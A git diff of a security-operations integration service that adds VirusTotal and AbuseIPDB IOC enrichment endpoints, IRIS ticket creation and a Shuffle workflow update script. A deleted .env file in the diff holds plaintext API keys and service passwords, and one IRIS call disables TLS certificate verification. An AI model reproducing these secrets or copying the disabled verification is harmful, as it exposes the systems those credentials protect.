+with open(template_file, "r", encoding="utf-8") as fh:
+    wf = json.load(fh)
+
+wf["id"] = workflow_id
+
+for field in ("created", "edited", "last_runtime", "owner", "updated_by"):
+    wf.pop(field, None)
+
+print(json.dumps(wf))
+PY
+
+curl -sS -o /tmp/shuffle_workflow_update_resp.json -w "%{http_code}" \
+  -X PUT "${SHUFFLE_BASE_URL}/api/v1/workflows/${WORKFLOW_ID}" \
+  -H "Authorization: Bearer ${SHUFFLE_API_KEY}" \
+  -H "Content-Type: application/json" \
+  --data-binary "@${tmp_payload}" >/tmp/shuffle_workflow_update_status.txt
+
+http_status="$(cat /tmp/shuffle_workflow_update_status.txt)"
+response="$(cat /tmp/shuffle_workflow_update_resp.json)"
+
+if [[ "${http_status}" != "200" ]]; then
+  echo "error: workflow update failed (HTTP ${http_status})"
+  echo "${response}"
+  exit 1
+fi
+
+WORKFLOW_UPDATE_RESPONSE="${response}" python3 - <<'PY'
+import json
+import os
+import sys
+
+raw = os.environ.get("WORKFLOW_UPDATE_RESPONSE", "")
+try:
+    data = json.loads(raw)
+except Exception:
+    print("updated, but response is not valid JSON:")
+    print(raw[:600])
+    sys.exit(0)
+
+if isinstance(data, dict) and data.get("success") is False:
+    print("error: API returned success=false")
+    print(raw)
+    sys.exit(1)
+
+workflow_id = data.get("id") if isinstance(data, dict) else None
+name = data.get("name") if isinstance(data, dict) else None
+print(f"updated: {name or '<unknown>'} id={workflow_id or '<unknown>'}")
+PY

shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md

@@ -0,0 +1,67 @@
+# Sample Workflow: Input Trigger -> Condition -> IRIS Ticket
+
+Workflow file:
+
+- `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
+
+## Purpose
+
+Accept payload data from `soc-integrator`, evaluate a condition, and create a new IRIS ticket when matched.
+
+Note: In your current environment, `Shuffle Tools 1.2.0` does not include the `webhook` action. This sample uses a supported start node (`repeat_back_to_me`) and should be triggered via `POST /api/v1/workflows/{id}/execute`.
+
+Condition in sample:
+
+- `source` in `["soc-integrator", "wazuh", "fortigate"]`
+- `severity` in `["high", "critical"]`
+
+If condition is not matched, workflow exits without ticket creation.
+
+## Import into Shuffle
+
+1. Open Shuffle UI.
+2. Go to Workflows.
+3. Import workflow JSON:
+   - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
+4. Save and open the workflow.
+5. Keep the workflow ID for execute API calls.
+
+## Update Existing Workflow By ID
+
+To update an already-created workflow (for example `0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`) with this template:
+
+```bash
+SHUFFLE_BASE_URL="http://localhost:5001" \
+SHUFFLE_API_KEY="<YOUR_API_KEY>" \
+scripts/update-shuffle-workflow-from-template.sh \
+0b2c5b48-0e02-49a3-8e12-2bc892ac15f9 \
+shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json
+```
+
+Then open:
+
+- `http://localhost:3001/workflows/0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`
+
+## Test Execute Payload
+
+```bash
+curl -sS -X POST "http://localhost:5001/api/v1/workflows/<WORKFLOW_ID>/execute" \
+  -H "Authorization: Bearer <SHUFFLE_API_KEY>" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "execution_argument": "{\"event_id\":\"evt-001\",\"source\":\"soc-integrator\",\"severity\":\"high\",\"title\":\"Suspicious VPN login outside Thailand\",\"description\":\"Detected by SOC Integrator rule A3-05\",\"integrator_url\":\"http://soc-integrator:8080\",\"internal_key\":\"\"}"
+  }'
+```
+
+## soc-integrator Endpoint Used
+
+The sample uses:
+
+- `POST /action/create-iris-case`
+
+Base URL is supplied from webhook payload field `integrator_url` (default in workflow: `http://soc-integrator:8080`).
+
+## Notes
+
+- If your `soc-integrator` route is protected, pass `internal_key` and ensure backend expects `X-Internal-Key`.
+- You can tighten/replace the match condition by editing the Python code in action `Condition Match + Create IRIS Ticket`.

soc-integrator/.env

@@ -1,34 +0,0 @@
-APP_ENV=dev
-LOG_LEVEL=INFO
-
-SOC_INTEGRATOR_INTERNAL_KEY=dev-internal-key
-SOC_INTEGRATOR_DB_HOST=soc-integrator-db
-SOC_INTEGRATOR_DB_PORT=5432
-SOC_INTEGRATOR_DB_NAME=soc_integrator
-SOC_INTEGRATOR_DB_USER=soc_integrator
-SOC_INTEGRATOR_DB_PASSWORD=soc_integrator_password
-
-WAZUH_BASE_URL=https://wazuh.manager:55000
-WAZUH_USERNAME=wazuh-wui
-WAZUH_PASSWORD=MyS3cr37P450r.*-
-WAZUH_INDEXER_URL=https://wazuh.indexer:9200
-WAZUH_INDEXER_USERNAME=admin
-WAZUH_INDEXER_PASSWORD=SecretPassword
-WAZUH_AUTO_SYNC_ENABLED=true
-WAZUH_AUTO_SYNC_INTERVAL_SECONDS=5
-WAZUH_AUTO_SYNC_QUERY=*
-WAZUH_AUTO_SYNC_LIMIT=50
-WAZUH_AUTO_SYNC_MINUTES=120
-
-SHUFFLE_BASE_URL=http://shuffle-backend:5001
-SHUFFLE_API_KEY=e9bf8031-038a-4ea9-9639-13eb08d535ab
-SHUFFLE_USERNAME=
-SHUFFLE_PASSWORD=
-
-PAGERDUTY_BASE_URL=http://pagerduty-stub
-PAGERDUTY_API_KEY=
-
-IRIS_BASE_URL=https://iriswebapp_nginx:8443
-IRIS_API_KEY=mq4FMyrcf255Snt6rgJbdIN67GGA2rQR5eMOjzE62GlQfV8JX6RSw92AHNeCjIWsZa__2IOKv3I6IhZTEPMaqw
-IRIS_DEFAULT_CUSTOMER_ID=1
-IRIS_DEFAULT_SOC_ID=

soc-integrator/.env.example

@@ -32,3 +32,5 @@ IRIS_BASE_URL=https://iriswebapp_nginx:8443
 IRIS_API_KEY=
 IRIS_DEFAULT_CUSTOMER_ID=1
 IRIS_DEFAULT_SOC_ID=
+VIRUSTOTAL_API_KEY=
+ABUSEIPDB_API_KEY=

soc-integrator/app/adapters/abuseipdb.py

@@ -0,0 +1,37 @@
+from __future__ import annotations
+
+from typing import Any
+
+import httpx
+
+
+class AbuseIpdbAdapter:
+    def __init__(self, base_url: str, api_key: str) -> None:
+        self.base_url = base_url.rstrip("/")
+        self.api_key = api_key
+
+    def _headers(self) -> dict[str, str]:
+        return {"Key": self.api_key, "Accept": "application/json"} if self.api_key else {}
+
+    async def check_ip(self, ip: str, max_age_in_days: int = 90, verbose: bool = True) -> dict[str, Any]:
+        if not self.api_key:
+            raise RuntimeError("AbuseIPDB API key is not configured")
+
+        url = f"{self.base_url}/check"
+        params = {
+            "ipAddress": ip.strip(),
+            "maxAgeInDays": max(1, int(max_age_in_days)),
+            "verbose": "true" if verbose else "false",
+        }
+        headers = self._headers()
+
+        async with httpx.AsyncClient(timeout=20.0) as client:
+            response = await client.get(url, headers=headers, params=params)
+            try:
+                response.raise_for_status()
+            except httpx.HTTPStatusError as exc:
+                detail = response.text.strip()
+                raise RuntimeError(
+                    f"AbuseIPDB returned {response.status_code} for {url}. Response: {detail}"
+                ) from exc
+            return response.json() if response.content else {"status_code": response.status_code}

soc-integrator/app/adapters/iris.py

@@ -62,3 +62,18 @@ class IrisAdapter:
             response = await client.get(url, headers=headers)
             response.raise_for_status()
             return response.json() if response.content else {"status_code": response.status_code}
+
+    async def list_cases(self, limit: int = 50, offset: int = 0) -> dict[str, Any]:
+        headers = self._headers()
+        url = f"{self.base_url}/api/v2/cases"
+        params = {"limit": max(1, limit), "offset": max(0, offset)}
+        async with httpx.AsyncClient(verify=False, timeout=20.0) as client:
+            response = await client.get(url, params=params, headers=headers)
+            try:
+                response.raise_for_status()
+            except httpx.HTTPStatusError as exc:
+                detail = response.text.strip()
+                raise RuntimeError(
+                    f"IRIS returned {response.status_code} for {url}. Response: {detail}"
+                ) from exc
+            return response.json() if response.content else {"status_code": response.status_code}

soc-integrator/app/adapters/virustotal.py

@@ -0,0 +1,84 @@
+from __future__ import annotations
+
+import base64
+from typing import Any
+
+import httpx
+
+
+class VirusTotalAdapter:
+    def __init__(self, base_url: str, api_key: str) -> None:
+        self.base_url = base_url.rstrip("/")
+        self.api_key = api_key
+
+    def _headers(self) -> dict[str, str]:
+        return {"x-apikey": self.api_key} if self.api_key else {}
+
+    def _build_path(self, ioc_type: str, ioc_value: str) -> str:
+        value = ioc_value.strip()
+        if ioc_type == "domain":
+            return f"/domains/{value}"
+        if ioc_type == "ip":
+            return f"/ip_addresses/{value}"
+        if ioc_type == "hash":
+            return f"/files/{value}"
+        if ioc_type == "url":
+            # VT URL ID is urlsafe base64(url) without trailing "="
+            encoded = base64.urlsafe_b64encode(value.encode("utf-8")).decode("utf-8").rstrip("=")
+            return f"/urls/{encoded}"
+        raise ValueError(f"Unsupported IOC type: {ioc_type}")
+
+    async def enrich_ioc(self, ioc_type: str, ioc_value: str) -> dict[str, Any]:
+        if not self.api_key:
+            raise RuntimeError("VirusTotal API key is not configured")
+
+        path = self._build_path(ioc_type, ioc_value)
+        url = f"{self.base_url}{path}"
+        headers = self._headers()
+
+        async with httpx.AsyncClient(timeout=20.0) as client:
+            response = await client.get(url, headers=headers)
+            try:
+                response.raise_for_status()
+            except httpx.HTTPStatusError as exc:
+                detail = response.text.strip()
+                raise RuntimeError(
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
+                ) from exc
+
+            return response.json() if response.content else {"status_code": response.status_code}
+
+    async def upload_file(self, filename: str, content: bytes) -> dict[str, Any]:
+        if not self.api_key:
+            raise RuntimeError("VirusTotal API key is not configured")
+
+        url = f"{self.base_url}/files"
+        headers = self._headers()
+        files = {"file": (filename, content)}
+
+        async with httpx.AsyncClient(timeout=60.0) as client:
+            response = await client.post(url, headers=headers, files=files)
+            try:
+                response.raise_for_status()
+            except httpx.HTTPStatusError as exc:
+                detail = response.text.strip()
+                raise RuntimeError(
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
+                ) from exc
+            return response.json() if response.content else {"status_code": response.status_code}
+
+    async def get_analysis(self, analysis_id: str) -> dict[str, Any]:
+        if not self.api_key:
+            raise RuntimeError("VirusTotal API key is not configured")
+        url = f"{self.base_url}/analyses/{analysis_id}"
+        headers = self._headers()
+        async with httpx.AsyncClient(timeout=20.0) as client:
+            response = await client.get(url, headers=headers)
+            try:
+                response.raise_for_status()
+            except httpx.HTTPStatusError as exc:
+                detail = response.text.strip()
+                raise RuntimeError(
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
+                ) from exc
+            return response.json() if response.content else {"status_code": response.status_code}

soc-integrator/app/config.py

@@ -40,5 +40,10 @@ class Settings(BaseSettings):
     iris_default_customer_id: int = 1
     iris_default_soc_id: str = ""
 
+    virustotal_base_url: str = "https://www.virustotal.com/api/v3"
+    virustotal_api_key: str = ""
+    abuseipdb_base_url: str = "https://api.abuseipdb.com/api/v2"
+    abuseipdb_api_key: str = ""
+
 
 settings = Settings()

soc-integrator/app/db.py

@@ -78,6 +78,25 @@ def init_schema() -> None:
         )
 
         cur.execute(
+            """
+            CREATE TABLE IF NOT EXISTS ioc_trace (
+              id BIGSERIAL PRIMARY KEY,
+              action TEXT NOT NULL,
+              ioc_type TEXT NOT NULL,
+              ioc_value TEXT NOT NULL,
+              providers JSONB NOT NULL,
+              request_payload JSONB NOT NULL,
+              response_payload JSONB NOT NULL,
+              matched BOOLEAN,
+              severity TEXT,
+              confidence DOUBLE PRECISION,
+              error TEXT,
+              created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
+            );
+            """
+        )
+
+        cur.execute(
             "CREATE INDEX IF NOT EXISTS idx_incident_events_incident_key_created_at ON incident_events(incident_key, created_at DESC);"
         )
         cur.execute(
@@ -86,3 +105,9 @@ def init_schema() -> None:
         cur.execute(
             "CREATE INDEX IF NOT EXISTS idx_escalation_audit_incident_key_attempted_at ON escalation_audit(incident_key, attempted_at DESC);"
         )
+        cur.execute(
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_created_at ON ioc_trace(created_at DESC);"
+        )
+        cur.execute(
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_type_value ON ioc_trace(ioc_type, ioc_value);"
+        )

soc-integrator/app/main.py

@@ -2,17 +2,22 @@ import asyncio
 import logging
 from datetime import datetime, timezone
 
-from fastapi import Depends, FastAPI, HTTPException
+from fastapi import Depends, FastAPI, File, HTTPException, UploadFile
 
+from app.adapters.abuseipdb import AbuseIpdbAdapter
 from app.adapters.iris import IrisAdapter
 from app.adapters.pagerduty import PagerDutyAdapter
 from app.adapters.shuffle import ShuffleAdapter
+from app.adapters.virustotal import VirusTotalAdapter
 from app.adapters.wazuh import WazuhAdapter
 from app.config import settings
 from app.db import init_schema
 from app.models import (
     ActionCreateIncidentRequest,
     ApiResponse,
+    IocEnrichRequest,
+    IocEvaluateRequest,
+    IrisTicketCreateRequest,
     ShuffleLoginRequest,
     ShuffleProxyRequest,
     TriggerShuffleRequest,
@@ -46,6 +51,14 @@ iris_adapter = IrisAdapter(
     base_url=settings.iris_base_url,
     api_key=settings.iris_api_key,
 )
+virustotal_adapter = VirusTotalAdapter(
+    base_url=settings.virustotal_base_url,
+    api_key=settings.virustotal_api_key,
+)
+abuseipdb_adapter = AbuseIpdbAdapter(
+    base_url=settings.abuseipdb_base_url,
+    api_key=settings.abuseipdb_api_key,
+)
 
 repo = MvpRepository()
 mvp_service = MvpService(
@@ -297,6 +310,422 @@ async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
     return ApiResponse(data={"iris": iris_result})
 
 
+@app.post("/iris/tickets", response_model=ApiResponse)
+async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
+    case_payload = {
+        "case_name": payload.title,
+        "case_description": payload.description,
+        "case_customer": payload.case_customer or settings.iris_default_customer_id,
+        "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
+    }
+    if payload.payload:
+        case_payload.update(payload.payload)
+    try:
+        iris_result = await iris_adapter.create_case(case_payload)
+    except Exception as exc:
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
+    return ApiResponse(data={"iris": iris_result})
+
+
+@app.get("/iris/tickets", response_model=ApiResponse)
+async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
+    try:
+        iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
+    except Exception as exc:
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
+    return ApiResponse(data={"iris": iris_result})
+
+
+def _build_vt_ioc_result(
+    vt: dict[str, object],
+    ioc_type: str,
+    ioc_value: str,
+    malicious_threshold: int,
+    suspicious_threshold: int,
+) -> tuple[dict[str, object], bool, str, float]:
+    stats = (
+        (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
+        if isinstance(vt, dict)
+        else None
+    ) or {}
+
+    malicious = int(stats.get("malicious", 0) or 0)
+    suspicious = int(stats.get("suspicious", 0) or 0)
+    harmless = int(stats.get("harmless", 0) or 0)
+    undetected = int(stats.get("undetected", 0) or 0)
+    total = malicious + suspicious + harmless + undetected
+    confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
+
+    matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
+    severity = "low"
+    if malicious >= 5 or suspicious >= 10:
+        severity = "critical"
+    elif malicious >= 2 or suspicious >= 5:
+        severity = "high"
+    elif malicious >= 1 or suspicious >= 1:
+        severity = "medium"
+
+    reason = (
+        f"virustotal_stats malicious={malicious} suspicious={suspicious} "
+        f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
+    )
+
+    result: dict[str, object] = {
+        "ioc_type": ioc_type,
+        "ioc_value": ioc_value,
+        "matched": matched,
+        "severity": severity,
+        "confidence": confidence,
+        "reason": reason,
+        "providers": {
+            "virustotal": {
+                "stats": stats,
+            }
+        },
+        "raw": {
+            "virustotal": vt,
+        },
+    }
+    return result, matched, severity, confidence
+
+
+def _build_abuseipdb_ioc_result(
+    abuse: dict[str, object],
+    ioc_value: str,
+    confidence_threshold: int = 50,
+) -> tuple[dict[str, object], bool, str, float]:
+    data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
+    score = int(data.get("abuseConfidenceScore", 0) or 0)
+    total_reports = int(data.get("totalReports", 0) or 0)
+    matched = score >= confidence_threshold
+
+    severity = "low"
+    if score >= 90:
+        severity = "critical"
+    elif score >= 70:
+        severity = "high"
+    elif score >= 30:
+        severity = "medium"
+
+    confidence = round(score / 100.0, 4)
+    reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
+    result: dict[str, object] = {
+        "ioc_type": "ip",
+        "ioc_value": ioc_value,
+        "matched": matched,
+        "severity": severity,
+        "confidence": confidence,
+        "reason": reason,
+        "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
+    }
+    return result, matched, severity, confidence
+
+
+@app.post("/ioc/enrich", response_model=ApiResponse)
+async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
+    providers = [p.lower().strip() for p in payload.providers]
+    result: dict[str, object] = {
+        "ioc_type": payload.ioc_type,
+        "ioc_value": payload.ioc_value,
+        "providers_requested": providers,
+        "providers": {},
+    }
+
+    if "virustotal" in providers:
+        try:
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
+            result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
+        except Exception as exc:
+            repo.add_ioc_trace(
+                action="enrich",
+                ioc_type=payload.ioc_type,
+                ioc_value=payload.ioc_value,
+                providers=providers,
+                request_payload=payload.model_dump(mode="json"),
+                response_payload={},
+                error=str(exc),
+            )
+            raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
+
+    if "abuseipdb" in providers:
+        if payload.ioc_type != "ip":
+            result["providers"] = {
+                **(result.get("providers") or {}),
+                "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
+            }
+        else:
+            try:
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
+                result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
+            except Exception as exc:
+                repo.add_ioc_trace(
+                    action="enrich",
+                    ioc_type=payload.ioc_type,
+                    ioc_value=payload.ioc_value,
+                    providers=providers,
+                    request_payload=payload.model_dump(mode="json"),
+                    response_payload={},
+                    error=str(exc),
+                )
+                raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
+
+    repo.add_ioc_trace(
+        action="enrich",
+        ioc_type=payload.ioc_type,
+        ioc_value=payload.ioc_value,
+        providers=providers,
+        request_payload=payload.model_dump(mode="json"),
+        response_payload=result,
+    )
+    return ApiResponse(data={"ioc": result})
+
+
+@app.post("/ioc/evaluate", response_model=ApiResponse)
+async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
+    providers = [p.lower().strip() for p in payload.providers]
+    supported = {"virustotal", "abuseipdb"}
+    requested = [p for p in providers if p in supported]
+    if not requested:
+        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
+
+    per_provider: dict[str, dict[str, object]] = {}
+    errors: dict[str, str] = {}
+
+    if "virustotal" in requested:
+        try:
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
+            vt_result, _, _, _ = _build_vt_ioc_result(
+                vt=vt,
+                ioc_type=payload.ioc_type,
+                ioc_value=payload.ioc_value,
+                malicious_threshold=payload.malicious_threshold,
+                suspicious_threshold=payload.suspicious_threshold,
+            )
+            per_provider["virustotal"] = vt_result
+        except Exception as exc:
+            errors["virustotal"] = str(exc)
+
+    if "abuseipdb" in requested:
+        if payload.ioc_type != "ip":
+            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
+        else:
+            try:
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
+                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
+                    abuse=abuse,
+                    ioc_value=payload.ioc_value,
+                    confidence_threshold=50,
+                )
+                per_provider["abuseipdb"] = abuse_result
+            except Exception as exc:
+                errors["abuseipdb"] = str(exc)
+
+    if not per_provider:
+        repo.add_ioc_trace(
+            action="evaluate",
+            ioc_type=payload.ioc_type,
+            ioc_value=payload.ioc_value,
+            providers=requested,
+            request_payload=payload.model_dump(mode="json"),
+            response_payload={},
+            error=str(errors),
+        )
+        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
+
+    # aggregate decision (max confidence/severity, matched if any provider matched)
+    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
+    matched = any(bool(r.get("matched")) for r in per_provider.values())
+    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
+    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
+    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
+    if errors:
+        reason_parts.append(f"errors={errors}")
+    ioc_result = {
+        "ioc_type": payload.ioc_type,
+        "ioc_value": payload.ioc_value,
+        "matched": matched,
+        "severity": severity,
+        "confidence": round(confidence, 4),
+        "reason": " | ".join(reason_parts),
+        "providers": per_provider,
+    }
+
+    repo.add_ioc_trace(
+        action="evaluate",
+        ioc_type=payload.ioc_type,
+        ioc_value=payload.ioc_value,
+        providers=providers,
+        request_payload=payload.model_dump(mode="json"),
+        response_payload=ioc_result,
+        matched=matched,
+        severity=severity,
+        confidence=float(ioc_result["confidence"]),
+    )
+
+    return ApiResponse(data={"ioc": ioc_result})
+
+
+@app.post("/ioc/upload-file", response_model=ApiResponse)
+async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
+    content = await file.read()
+    if not content:
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
+    try:
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
+    except Exception as exc:
+        repo.add_ioc_trace(
+            action="upload_file",
+            ioc_type="hash",
+            ioc_value=file.filename or "<unknown>",
+            providers=["virustotal"],
+            request_payload={"filename": file.filename, "size": len(content)},
+            response_payload={},
+            error=str(exc),
+        )
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
+
+    repo.add_ioc_trace(
+        action="upload_file",
+        ioc_type="hash",
+        ioc_value=file.filename or "<unknown>",
+        providers=["virustotal"],
+        request_payload={"filename": file.filename, "size": len(content)},
+        response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
+    )
+    return ApiResponse(data={"virustotal": vt_upload})
+
+
+@app.get("/ioc/analysis/{analysis_id}", response_model=ApiResponse)
+async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
+    try:
+        vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
+    except Exception as exc:
+        repo.add_ioc_trace(
+            action="analysis",
+            ioc_type="hash",
+            ioc_value=analysis_id,
+            providers=["virustotal"],
+            request_payload={"analysis_id": analysis_id},
+            response_payload={},
+            error=str(exc),
+        )
+        raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
+
+    repo.add_ioc_trace(
+        action="analysis",
+        ioc_type="hash",
+        ioc_value=analysis_id,
+        providers=["virustotal"],
+        request_payload={"analysis_id": analysis_id},
+        response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
+    )
+    return ApiResponse(data={"virustotal": vt_analysis})
+
+
+@app.post("/ioc/evaluate-file", response_model=ApiResponse)
+async def ioc_evaluate_file(
+    file: UploadFile = File(...),
+    malicious_threshold: int = 1,
+    suspicious_threshold: int = 3,
+    poll_timeout_seconds: int = 30,
+    poll_interval_seconds: int = 2,
+) -> ApiResponse:
+    content = await file.read()
+    if not content:
+        raise HTTPException(status_code=400, detail="Uploaded file is empty")
+
+    try:
+        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
+    except Exception as exc:
+        repo.add_ioc_trace(
+            action="evaluate_file",
+            ioc_type="hash",
+            ioc_value=file.filename or "<unknown>",
+            providers=["virustotal"],
+            request_payload={"filename": file.filename, "size": len(content)},
+            response_payload={},
+            error=str(exc),
+        )
+        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
+
+    analysis_id = (
+        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
+        or ""
+    )
+    if not analysis_id:
+        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
+
+    timeout = max(1, poll_timeout_seconds)
+    interval = max(1, poll_interval_seconds)
+    elapsed = 0
+    analysis: dict[str, object] = {}
+    while elapsed <= timeout:
+        analysis = await virustotal_adapter.get_analysis(analysis_id)
+        status = (
+            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
+            if isinstance(analysis, dict)
+            else None
+        )
+        if status == "completed":
+            break
+        await asyncio.sleep(interval)
+        elapsed += interval
+
+    sha256 = (
+        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
+        if isinstance(analysis, dict)
+        else None
+    )
+    if not sha256:
+        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
+
+    try:
+        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
+    except Exception as exc:
+        repo.add_ioc_trace(
+            action="evaluate_file",
+            ioc_type="hash",
+            ioc_value=str(sha256),
+            providers=["virustotal"],
+            request_payload={"filename": file.filename, "analysis_id": analysis_id},
+            response_payload={"upload": vt_upload, "analysis": analysis},
+            error=str(exc),
+        )
+        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
+
+    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
+        vt=vt_file,
+        ioc_type="hash",
+        ioc_value=str(sha256),
+        malicious_threshold=malicious_threshold,
+        suspicious_threshold=suspicious_threshold,
+    )
+    ioc_result["analysis_id"] = analysis_id
+    ioc_result["filename"] = file.filename
+
+    repo.add_ioc_trace(
+        action="evaluate_file",
+        ioc_type="hash",
+        ioc_value=str(sha256),
+        providers=["virustotal"],
+        request_payload={"filename": file.filename, "analysis_id": analysis_id},
+        response_payload={
+            "upload": vt_upload,
+            "analysis": analysis,
+            "ioc": ioc_result,
+        },
+        matched=matched,
+        severity=severity,
+        confidence=confidence,
+    )
+    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
+
+
+@app.get("/ioc/history", response_model=ApiResponse)
+async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
+    return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
+
+
 @app.get("/sync/wazuh-version", response_model=ApiResponse)
 async def sync_wazuh_version() -> ApiResponse:
     try:

soc-integrator/app/models.py

@@ -25,6 +25,28 @@ class ActionCreateIncidentRequest(BaseModel):
     payload: dict[str, Any] = Field(default_factory=dict)
 
 
+class IrisTicketCreateRequest(BaseModel):
+    title: str
+    description: str = "Created by soc-integrator"
+    case_customer: int | None = None
+    case_soc_id: str | None = None
+    payload: dict[str, Any] = Field(default_factory=dict)
+
+
+class IocEnrichRequest(BaseModel):
+    ioc_type: Literal["domain", "ip", "hash", "url"]
+    ioc_value: str
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
+
+
+class IocEvaluateRequest(BaseModel):
+    ioc_type: Literal["domain", "ip", "hash", "url"]
+    ioc_value: str
+    providers: list[str] = Field(default_factory=lambda: ["virustotal"])
+    malicious_threshold: int = 1
+    suspicious_threshold: int = 3
+
+
 class TriggerShuffleRequest(BaseModel):
     workflow_id: str
     execution_argument: dict[str, Any] = Field(default_factory=dict)

soc-integrator/app/repositories/mvp_repo.py

@@ -151,3 +151,52 @@ class MvpRepository:
                 """,
                 (incident_key, status_code, success, response_excerpt),
             )
+
+    def add_ioc_trace(
+        self,
+        action: str,
+        ioc_type: str,
+        ioc_value: str,
+        providers: list[str],
+        request_payload: dict[str, Any],
+        response_payload: dict[str, Any],
+        matched: bool | None = None,
+        severity: str | None = None,
+        confidence: float | None = None,
+        error: str | None = None,
+    ) -> None:
+        with get_conn() as conn, conn.cursor() as cur:
+            cur.execute(
+                """
+                INSERT INTO ioc_trace(
+                  action, ioc_type, ioc_value, providers,
+                  request_payload, response_payload, matched, severity, confidence, error
+                )
+                VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
+                """,
+                (
+                    action,
+                    ioc_type,
+                    ioc_value,
+                    Json(providers),
+                    Json(request_payload),
+                    Json(response_payload),
+                    matched,
+                    severity,
+                    confidence,
+                    error,
+                ),
+            )
+
+    def list_ioc_trace(self, limit: int = 50, offset: int = 0) -> list[dict[str, Any]]:
+        with get_conn() as conn, conn.cursor() as cur:
+            cur.execute(
+                """
+                SELECT id, action, ioc_type, ioc_value, providers, matched, severity, confidence, error, created_at
+                FROM ioc_trace
+                ORDER BY created_at DESC
+                LIMIT %s OFFSET %s
+                """,
+                (max(1, limit), max(0, offset)),
+            )
+            return [dict(row) for row in cur.fetchall()]

soc-integrator/examples/README.md

@@ -25,3 +25,22 @@ This script demonstrates:
 
 1. Direct call to `IRIS /api/v2/cases`
 2. Call through `soc-integrator /action/create-iris-case`
+
+## Send sample event to Shuffle webhook
+
+Use this helper with the sample workflow:
+
+- `/Users/simplicoltd./projects/soc/shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
+
+Run:
+
+```bash
+SHUFFLE_WEBHOOK_URL='http://localhost:3001/api/v1/hooks/webhook_xxx' \
+bash soc-integrator/examples/send_to_shuffle_webhook.sh
+```
+
+Environment variables:
+
+- `SHUFFLE_WEBHOOK_URL` (required)
+- `INTEGRATOR_URL` (default: `http://localhost:8088`)
+- `INTERNAL_KEY` (optional)

soc-integrator/examples/send_to_shuffle_webhook.sh

@@ -0,0 +1,29 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
